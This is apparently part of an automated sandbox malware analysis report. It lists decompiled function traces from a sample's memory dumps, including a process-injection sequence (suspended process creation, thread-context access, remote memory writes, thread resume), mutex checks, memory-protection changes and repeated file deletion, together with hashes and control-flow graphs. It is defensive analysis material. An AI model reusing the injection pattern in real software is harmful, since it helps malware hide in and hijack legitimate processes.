                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction ID: 2a80003d27717977124701b8026b26c6787b26f5450d949885d04d1fcbbdf16c
                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                          • Instruction Fuzzy Hash: A73277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                            • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                            • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                            • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                            • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                            • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                            • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                            • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                            • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02413409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 511 2413409-2413462 GetVolumeInformationA call 2413634
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02413405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02413409
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction ID: f1f5f59a51abdcf2a43967d54cb10672140bd40e096f884b3ee3f57d9bd504ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction Fuzzy Hash: 78F0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C9AA4DBF206CA30A599CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 02412951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(02412949,00000008,?,00000000,02412835,00000000), ref: 02412956
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02412993
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129C1), ref: 024129D0
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 75c66eb54fa99e83cd6d10e9b9eb073483e129dbe3991202e78fb6292cb1427a
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B518571500224AEDB22FF718D48FAB77BDEF40704F4404ABAE45EA045EF749680CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 574 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->574 567->566 582 1c2a48-1c2a4f 574->582 582->574 584 1c2a51-1c2a6d call 1c343f call 1c2683 582->584 594 1c2a6f 584->594 595 1c2a9a-1c2ab1 call 1c2683 584->595 594->595 597 1c2a71-1c2a86 call 1c26f9 594->597 600 1c2ade-1c2af5 call 1c2683 595->600 601 1c2ab3 595->601 597->595 605 1c2a88 597->605 610 1c2af8-1c2b11 call 1c2e97 600->610 611 1c2af7 600->611 601->600 603 1c2ab5-1c2aca call 1c26f9 601->603 603->600 612 1c2acc 603->612 605->595 606 1c2a8a-1c2a94 DeleteFileA 605->606 606->595 616 1c2b34-1c2b48 Sleep 610->616 617 1c2b13-1c2b1c call 1c3057 610->617 611->610 612->600 615 1c2ace-1c2ad8 DeleteFileA 612->615 615->600 616->582 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 024109FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 703 24109fd-2410a0c call 2413677 CreateProcessA 706 2410b10 call 2410b17 703->706 707 2410a12-2410a34 GetThreadContext 703->707 711 2410b15-2410b16 706->711 707->706 708 2410a3a-2410a5f VirtualProtectEx 707->708 708->706 710 2410a65-2410aa4 DuplicateHandle 708->710 710->706 712 2410aa6-2410ad2 WriteProcessMemory 710->712 712->706 713 2410ad4-2410ae0 ResumeThread 712->713 714 2410ae5-2410b09 Sleep OpenMutexA 713->714 714->711 715 2410b0b-2410b0e 714->715 715->706 715->714
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,024109F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02410A04
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02410A2C
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02410A57
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02415834,00000000,00000000,00000002), ref: 02410A9C
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02410ACA
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02410ADA
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02410AEA
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02410B01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d83fe3bac47f13b8a479bbac9cd74855ff78128466e49bd4477d16f3698b1552
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 213141316402149FEF225F50CC85BAA77B8BF04748F0805D5BE49FE1E9DBB09690CE64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 697 1c0af1-1c0af2 692->697 693->692 694 1c0a16-1c0a3b VirtualProtectEx 693->694 694->692 696 1c0a3c-1c0a80 DuplicateHandle 694->696 696->692 699 1c0a82-1c0aae WriteProcessMemory 696->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->697 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 024129CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129C1), ref: 024129D0
                                                                                                                                                                            • Part of subcall function 02412A01: lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
                                                                                                                                                                            • Part of subcall function 02412A01: lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
                                                                                                                                                                            • Part of subcall function 02412A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
                                                                                                                                                                            • Part of subcall function 02412A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c17460d5d5ae24aa734a8021d29e5248295317fa7bfea61926b70e992cd516a4
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: EC414371400668AEDB22EF718D48FAF77BDEF40704F4044ABAE85EA055DB749680CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 749 1c2ade-1c2af5 call 1c2683 744->749 750 1c2ab3 744->750 746->744 754 1c2a88 746->754 759 1c2af8-1c2b11 call 1c2e97 749->759 760 1c2af7 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02412A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 871 2412a01-2412a3e call 2413677 lstrcat call 2412525 call 2412a38 call 2413677 lstrcat 881 2412a44-2412a67 call 2412b71 call 241351b 871->881 885 2412a6c-2412a73 881->885 885->881 886 2412a75-2412a91 call 2413463 call 24126a7 885->886 891 2412a93 886->891 892 2412abe-2412ad5 call 24126a7 886->892 891->892 893 2412a95-2412aaa call 241271d 891->893 898 2412b02-2412b19 call 24126a7 892->898 899 2412ad7 892->899 893->892 901 2412aac 893->901 906 2412b1b 898->906 907 2412b1c-2412b35 call 2412ebb 898->907 899->898 902 2412ad9-2412aee call 241271d 899->902 901->892 904 2412aae-2412ab8 DeleteFileA 901->904 902->898 910 2412af0 902->910 904->892 906->907 913 2412b37-2412b40 call 241307b 907->913 914 2412b58-2412b6c Sleep 907->914 910->898 912 2412af2-2412afc DeleteFileA 910->912 912->898 913->914 917 2412b42-2412b52 DeleteFileA 913->917 914->885 917->914
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,024129F8), ref: 02412A07
                                                                                                                                                                            • Part of subcall function 02412A38: lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
                                                                                                                                                                            • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
                                                                                                                                                                            • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
                                                                                                                                                                            • Part of subcall function 02412A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
                                                                                                                                                                            • Part of subcall function 02412A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
